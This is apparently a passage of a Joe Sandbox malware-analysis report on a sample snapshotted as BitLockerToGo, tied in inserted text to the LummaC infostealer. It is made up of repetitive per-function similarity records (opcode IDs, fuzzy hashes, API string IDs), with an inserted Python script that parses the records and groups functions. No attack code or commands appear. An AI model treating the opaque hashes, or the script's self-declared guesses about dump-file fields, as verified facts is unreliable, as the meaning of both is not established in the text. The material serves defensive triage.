                                                                                                                                                                                                              • String ID: _Ve;
                                                                                                                                                                                                              • API String ID: 0-1939530796
                                                                                                                                                                                                              • Opcode ID: 01b681acaaf8cfe9d95a95cf0a6eead1e27eefb0fd4692f0e69128d432eec5f9
                                                                                                                                                                                                              • Instruction ID: 330e403d0652c3068399858570d97d18b12cd48a1c18ec82e72964fe0d0ca427
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01b681acaaf8cfe9d95a95cf0a6eead1e27eefb0fd4692f0e69128d432eec5f9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DE11636B142108FD318CF29D89166BB3E2EFC9314F0A897DD899D7394DA39DC458B85
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: *<
                                                                                                                                                                                                              • API String ID: 0-31302224
                                                                                                                                                                                                              • Opcode ID: d021d1e27a8b080e9ca32d5ac4b0c2fc9e27e53c751eb93a3315a99bcf08efee
                                                                                                                                                                                                              • Instruction ID: 975738940ea86278593d4b2db08cc52da99656c47fc2cfe6abed545f71517476
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d021d1e27a8b080e9ca32d5ac4b0c2fc9e27e53c751eb93a3315a99bcf08efee
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54D1F6B55093008BD721AF24D8517EBB3A4FFC6314F14452EE5C99B3A1EB389941CB5A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                              • API String ID: 0-336475711
                                                                                                                                                                                                              • Opcode ID: 6ef4858a509dc4cdf184841b975ef3ff71504944214386f4843698eac8c18c89
                                                                                                                                                                                                              • Instruction ID: 2f73f8a709d549562e3d7cf930d7ac737898b17613de950682556bef1c03a8d3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ef4858a509dc4cdf184841b975ef3ff71504944214386f4843698eac8c18c89
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08D1D37A618351CBCB189F24E85227BB3F1FF4A741F0B987DD841872A4EB3A8950D746
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: "
                                                                                                                                                                                                              • API String ID: 0-123907689
                                                                                                                                                                                                              • Opcode ID: cb17e7c1b373ae868c44e9598b488d8d6bc4fb0b8933aa7dad50c6f238b26d1a
                                                                                                                                                                                                              • Instruction ID: 94a86bae69f0cded1cd4c5f51765d04778e5bfeb54991f1d1b4d9956c4e80e3f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb17e7c1b373ae868c44e9598b488d8d6bc4fb0b8933aa7dad50c6f238b26d1a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31C14A72B083206BD714CE24E490B6BB7E9AF84314F58896FE89587381D73CDC45C796
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocString
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2525500382-0
                                                                                                                                                                                                              • Opcode ID: eef166c5c5dfea6ab23290ede3330cb0984d3a47adec6e6c5c5b8f68a533f617
                                                                                                                                                                                                              • Instruction ID: ad1c33575bae2ed3009f960dfe5129d1648ce1fd3ab50d194c84beb6a775bd63
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eef166c5c5dfea6ab23290ede3330cb0984d3a47adec6e6c5c5b8f68a533f617
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E5195A2664B419BC314CF29C940451F3B2FF89320329A71CC5658FBB1E738F565D78A
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocString
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2525500382-0
                                                                                                                                                                                                              • Opcode ID: cd40e5180104e3fea352708efa22aa5445976ff024ae474a8b90d297d1b8eb05
                                                                                                                                                                                                              • Instruction ID: 1fe73e8abda640fc45fc8abb7656ea38db8a0305603315cc0b16c9cb29a464cc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd40e5180104e3fea352708efa22aa5445976ff024ae474a8b90d297d1b8eb05
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE5181B26A0B019BC314CF29C940456B3B2FF99310329AB1CC5698BFB1E738F565D789
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: l
                                                                                                                                                                                                              • API String ID: 0-962745716
                                                                                                                                                                                                              • Opcode ID: 9e16378b57c435b3adfd03d972b0411f122b2d91f08cdd714cb790fe03796a48
                                                                                                                                                                                                              • Instruction ID: a729820b8e819a76a27f29a9a4287a7da9ba66fc493bdc63a1e6a8b259b003c4
• Opcode Fuzzy Hash: 9e16378b57c435b3adfd03d972b0411f122b2d91f08cdd714cb790fe03796a48
• Instruction Fuzzy Hash: 78B11975214B01DFD318CF29C890B62BBE2FFA6310B14866DC4998BBA1D779F815CB84
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: vC
• API String ID: 0-1371296168
• Opcode ID: 4105dde6d64d899df630aa6fc63b597750c2bcd0d9dc4e6b55e01dc50c713722
• Instruction ID: 6a6d0a71e1b84a727b213308c2c785541bafad44c80d4ad8f03617fbbb732a02
• Opcode Fuzzy Hash: 4105dde6d64d899df630aa6fc63b597750c2bcd0d9dc4e6b55e01dc50c713722
• Instruction Fuzzy Hash: 25A155766083009BD328DF28CC9276BB7D2FB89314F15983DE9C997391DB799805CB86
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID: m6i
• API String ID: 2994545307-433365587
• Opcode ID: 8bde33d7d81af4f78b099eaeba40ffaf7b1d1fb6752c7080faba678fe93ad405
• Instruction ID: 2c2128ccbe77a5ce63f3182006c32708a20dcc8672a5bd55d4515132e68f9f4e
• Opcode Fuzzy Hash: 8bde33d7d81af4f78b099eaeba40ffaf7b1d1fb6752c7080faba678fe93ad405
• Instruction Fuzzy Hash: 4D913435A047118BD714DF18E850A6BB3E2FFDC710F16A42DE9888B364EB79AC51C785
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: B4B
• API String ID: 0-2946978807
• Opcode ID: be586f6a036dd460c41b697459eb5122b12174c17e66ebc03f4b9dc89260c007
• Instruction ID: 93deb56d5e0a48064e38cfb70b86653f6b10d7626219e1a5513b4a15b4d9da42
• Opcode Fuzzy Hash: be586f6a036dd460c41b697459eb5122b12174c17e66ebc03f4b9dc89260c007
• Instruction Fuzzy Hash: A2A101B16083159FD710CF68D8807AFF7E0FBC8344F01892DF999AB280D7B499498B86
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: ~
• API String ID: 0-1707062198
• Opcode ID: 37ee67bda75a7dbd8089ec974ae9b1b12fc6fd802d9593f2840d077afb9ed359
• Instruction ID: 623894f12c3e1cafc853d53a6c0bca52113d159c92967f89b04db2b7b94af6a7
• Opcode Fuzzy Hash: 37ee67bda75a7dbd8089ec974ae9b1b12fc6fd802d9593f2840d077afb9ed359
• Instruction Fuzzy Hash: 58812B729442614FC7128E288C903ABBBD1AB85324F19C27DDCB99B3C2D7788C46D7D1
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: B4B
• API String ID: 0-2946978807
• Opcode ID: 6cdb34c774402e49e4f6ace5e2708362c594fbf75a7442bf04e1c134fa01d3cc
• Instruction ID: db7325596d52a72db0a66b40dabd6d40ff4049512e233b3c57ee9eeb7c74cf3b
• Opcode Fuzzy Hash: 6cdb34c774402e49e4f6ace5e2708362c594fbf75a7442bf04e1c134fa01d3cc
• Instruction Fuzzy Hash: A4A101B0E04318AFDB10DFA8D9857AEBBB4FB85304F10456DF698AB280D7744948CB96
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: ,
• API String ID: 0-3772416878
• Opcode ID: d9dec9febcea7046455d8fb5a57df134163c7b989985a148f1426b4dc8793823
• Instruction ID: 381d5142375ae06eb755a876d455664e370f8041fbfe0758d06cf5185896235e
• Opcode Fuzzy Hash: d9dec9febcea7046455d8fb5a57df134163c7b989985a148f1426b4dc8793823
• Instruction Fuzzy Hash: 3EB139711097819FD321DF28C88061BFBE0AFA9704F444A2DF5D997782D635E918CB67
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: @vEv
• API String ID: 0-3729063050
• Opcode ID: f624b316539e4302f1e960413ea034e0a14242dd65e0855f03b1eef00a3c5446
• Instruction ID: c7e334dc5a1955d81e2995a774378bd6fd7f03f37499ec234d45d35508b10063
• Opcode Fuzzy Hash: f624b316539e4302f1e960413ea034e0a14242dd65e0855f03b1eef00a3c5446
• Instruction Fuzzy Hash: 6171FFB07003109BD7209F64DC82B6773B4EFA5358F54452DFA869B3A1E379E904C76A
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: "
• API String ID: 0-123907689
• Opcode ID: a3c45a116d1bcfb82e13fe65b12956e147a2fd8ad73a016dda39fbd2ee11f08e
• Instruction ID: 19cccde6760c41f13b197726376158566d666e76366353ce09bb017b74a89e80
• Opcode Fuzzy Hash: a3c45a116d1bcfb82e13fe65b12956e147a2fd8ad73a016dda39fbd2ee11f08e
• Instruction Fuzzy Hash: C3710972B183258BD714CE2CD88031FB7E2ABC6720F59852FE49497395D3399D45C78A
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: VgB
• API String ID: 0-622745292
• Opcode ID: 06eb299f1e1fbe06f27e03308be1bea417eb84fe81fafd33d7182eb34c649aae
• Instruction ID: ec0ce4220d91cbe85ef60df19b57f331c9c9a21615ff78bcf4e9ef35e2733c52
• Opcode Fuzzy Hash: 06eb299f1e1fbe06f27e03308be1bea417eb84fe81fafd33d7182eb34c649aae
• Instruction Fuzzy Hash: A351CEB5508304EBD310CF24D84175BBBE4FBC9314F016E3DE989AB2A0EB759544CB8A
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: _Ve;
• API String ID: 0-1939530796
• Opcode ID: 5c4316164d995bff05c224b46600ecaf542428b36f61fcb6de5382298520ce92
• Instruction ID: 8571bfd9b79df5e2348bdad1db6d0e4a85cb5fc2431ebceaf223297aee0cf683
• Opcode Fuzzy Hash: 5c4316164d995bff05c224b46600ecaf542428b36f61fcb6de5382298520ce92
• Instruction Fuzzy Hash: 1441273261C3154BD718DF24C8D127BF7D29BC9344F1AA52ED886A7382E774EA058BC9
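The per-function records above are Joe Sandbox's similarity fingerprints for the memory dump of process 3 (snapshot hcaresult_3_2_400000_BitLockerToGo.jbxd). When triaging a family like this, the useful moves are to pull the records out of the report text, group functions that share an API String ID, and keep the Opcode and Instruction fuzzy hashes so they can be matched against other reports. The following Python is an added example and is not part of the report or of Joe Sandbox's own tooling. The three embedded records are copied from the report above; the layout parsed (a record opens at a "Strings" header and carries "• Key: Value" bullets) is what the page shows. The meaning assigned to the dotted fields of the .sdmp name (process index, base address, page protection, region type) is an assumption: only the base address is confirmed by the record's own Offset field.

```python
"""Parse Joe Sandbox per-function 'Similarity' records and pivot on them."""
import re
from collections import defaultdict

# Constructed sample: three records copied verbatim from the report above.
SAMPLE = """\
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID: m6i
• API String ID: 2994545307-433365587
• Opcode ID: 8bde33d7d81af4f78b099eaeba40ffaf7b1d1fb6752c7080faba678fe93ad405
• Instruction ID: 2c2128ccbe77a5ce63f3182006c32708a20dcc8672a5bd55d4515132e68f9f4e
• Opcode Fuzzy Hash: 8bde33d7d81af4f78b099eaeba40ffaf7b1d1fb6752c7080faba678fe93ad405
• Instruction Fuzzy Hash: 4D913435A047118BD714DF18E850A6BB3E2FFDC710F16A42DE9888B364EB79AC51C785
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: B4B
• API String ID: 0-2946978807
• Opcode ID: be586f6a036dd460c41b697459eb5122b12174c17e66ebc03f4b9dc89260c007
• Instruction ID: 93deb56d5e0a48064e38cfb70b86653f6b10d7626219e1a5513b4a15b4d9da42
• Opcode Fuzzy Hash: be586f6a036dd460c41b697459eb5122b12174c17e66ebc03f4b9dc89260c007
• Instruction Fuzzy Hash: A2A101B16083159FD710CF68D8807AFF7E0FBC8344F01892DF999AB280D7B499498B86
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: B4B
• API String ID: 0-2946978807
• Opcode ID: 6cdb34c774402e49e4f6ace5e2708362c594fbf75a7442bf04e1c134fa01d3cc
• Instruction ID: db7325596d52a72db0a66b40dabd6d40ff4049512e233b3c57ee9eeb7c74cf3b
• Opcode Fuzzy Hash: 6cdb34c774402e49e4f6ace5e2708362c594fbf75a7442bf04e1c134fa01d3cc
• Instruction Fuzzy Hash: A4A101B0E04318AFDB10DFA8D9857AEBBB4FB85304F10456DF698AB280D7744948CB96
"""

# "• Key: Value" bullet; the value may itself contain colons (the Source File line does).
FIELD = re.compile(r"^\s*•\s*([^:]+):\s*(.*)$")


def parse_records(text):
    """Return one dict per function record; a record opens at a 'Strings' header."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "Strings":
            cur = {}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = FIELD.match(line)
        if not m:
            continue  # section headers such as 'Similarity' carry no value
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            # "<name>.sdmp, Offset: 00400000, based on PE: true" holds two more fields
            parts = [p.strip() for p in value.split(", ")]
            cur["Source File"] = parts[0]
            for part in parts[1:]:
                k, _, v = part.partition(": ")
                cur[k] = v
        else:
            cur[key] = value
    return records


def group_by_api_string_id(records):
    """Map each API String ID to the Opcode IDs of the functions that share it."""
    groups = defaultdict(list)
    for r in records:
        groups[r.get("API String ID", "")].append(r["Opcode ID"])
    return dict(groups)


def inconsistent_opcode_records(records):
    """Opcode IDs whose record's Opcode Fuzzy Hash differs from the Opcode ID.
    Every record on the page has the two equal, so a mismatch means a parse error."""
    return [r["Opcode ID"] for r in records
            if r.get("Opcode ID") != r.get("Opcode Fuzzy Hash")]


def describe_dump(source_file):
    """Split the .sdmp name into its dotted fields.
    Assumption (not stated on the page): field 0 is the process index, field 3 the
    base address (it matches the record's Offset), field 4 the page protection and
    field 6 the region type, both in Win32 encoding (0x40 is PAGE_EXECUTE_READWRITE,
    0x20000 is MEM_PRIVATE)."""
    fields = source_file.rsplit(".", 1)[0].split(".")
    return {
        "process_index": int(fields[0]),
        "base": int(fields[3], 16),
        "protection": int(fields[4], 16),
        "region_type": int(fields[6], 16),
    }


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for sid, opcodes in group_by_api_string_id(recs).items():
        print(sid, len(opcodes), "function(s)")
    print(describe_dump(recs[0]["Source File"]))
```

Running it against a whole report instead of SAMPLE (read the text, strip the leading indentation, pass it to parse_records) gives a table of Opcode and Instruction fuzzy hashes that can be diffed against the same table from another LummaC sample to see which functions the two builds share.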
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 89761899fdcd5bbf010a814062f086fdcc676d2c9f40afabd63fc75ed55a7ab4
                                                                                                                                                                                                              • Instruction ID: 0e481ca79685c8c9c511c99b322e06c2f8bf8bc3be077fb3bec636c30ccfcea0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89761899fdcd5bbf010a814062f086fdcc676d2c9f40afabd63fc75ed55a7ab4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3BD1375988D3C56FDB528A700CE94D6BF68ED1312035896EFDCD64A487D70CA20FE726
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: cce8e4b512898664201523a09bafce5068197cb2e82f619fbdc25e15211de2c4
                                                                                                                                                                                                              • Instruction ID: e14a337cb59f73f4eb96b3197ce793777e5d498d0cb7cd75f49a751dbb57fa3e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cce8e4b512898664201523a09bafce5068197cb2e82f619fbdc25e15211de2c4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64A1143AE002248BCB28CFA8E851BAEB7B2FF89300F56416DD945B7351D7396D51CB84
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: ff89cd7481519196bfd7edadc3bc1243657998fc0abde34e41e9d5a5b2764abb
                                                                                                                                                                                                              • Instruction ID: a0447cd09e6e8f4f002edc290cdf2f2efc31a9c7ba8c268c6ca938ca7010d7ed
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff89cd7481519196bfd7edadc3bc1243657998fc0abde34e41e9d5a5b2764abb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66D1F075608291CFD7148F29E81132BBBE2BFC6320F1A8AADE4A1972E1D735D940CB45
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 29a1067eea8e227af260fdf25b867c6e35937d5963c3d30cffd22b6def3b242c
                                                                                                                                                                                                              • Instruction ID: c44e9ddbf9b2512b793fb5ffbe277914e5cda94946df6dec4b18f3ae91943e1b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 29a1067eea8e227af260fdf25b867c6e35937d5963c3d30cffd22b6def3b242c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CB14875944301AFD7219F24DC81B6ABBE1FFC8368F144A2EF898932E0D7359C598B46
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 81f72856bbb47050cb0d1f5562e10f568441e2186a78c190d2939d4288837af4
                                                                                                                                                                                                              • Instruction ID: cd195e56b245e86e4f1a4827f1511509cfbc0d11c149cffb59f42c62929c843f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81f72856bbb47050cb0d1f5562e10f568441e2186a78c190d2939d4288837af4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32A13232B053219BD7248F19D88076BB3E2FFC8310F19A52DE9859B3A4DB79AC51C785
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 0fb82c8f41fe862e8f5f2d549d2e08dc1927388a173b0262696c8ba9cb2b7a2b
                                                                                                                                                                                                              • Instruction ID: 2022bbf19441b8f94a73070f535634fd4a70d08abb736e01ef997c90f7ddb05b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fb82c8f41fe862e8f5f2d549d2e08dc1927388a173b0262696c8ba9cb2b7a2b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19C15CB29087418FC360CF28DC96BABB7E1BF85318F09492DD1DAD6342D778A155CB46
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f7cb5e740af0763ae4ad8cd122f8ad3bea70a41f73439cb703f866134083ea8a
                                                                                                                                                                                                              • Instruction ID: 4c6ce0761b6d960950cfffb437402114a419437165ccd67c5dc7a314ec07d1d6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7cb5e740af0763ae4ad8cd122f8ad3bea70a41f73439cb703f866134083ea8a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78819B72B0836047D32C8F39C861377BBD29FD6300F19896EEDD69B395DA3988058746
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 62f196445c551d915e9875b9c3c787f56a2898d18b8b166ddce61da84134318f
                                                                                                                                                                                                              • Instruction ID: a6a6e12ccf1f1edaa7db106d9392e4e1593eaf584362187802091c4455a2c7ae
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62f196445c551d915e9875b9c3c787f56a2898d18b8b166ddce61da84134318f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3581BD72B0836047D32C8B39D861377BBD29FD6300F19896EDDD69B395DA3D88058346
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 8f30f38bed6b30110620228f027c5e55c9ee344176152f37456ceead2c944241
                                                                                                                                                                                                              • Instruction ID: a452e189543b328afc5c947086a31a41054aabf9733da30c5f5ff15ad50dbe88
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f30f38bed6b30110620228f027c5e55c9ee344176152f37456ceead2c944241
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6081363AE00225CBCB28CFA8E8517AEB7B2FF89300F55416DD945A7391DB396D51CB84
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
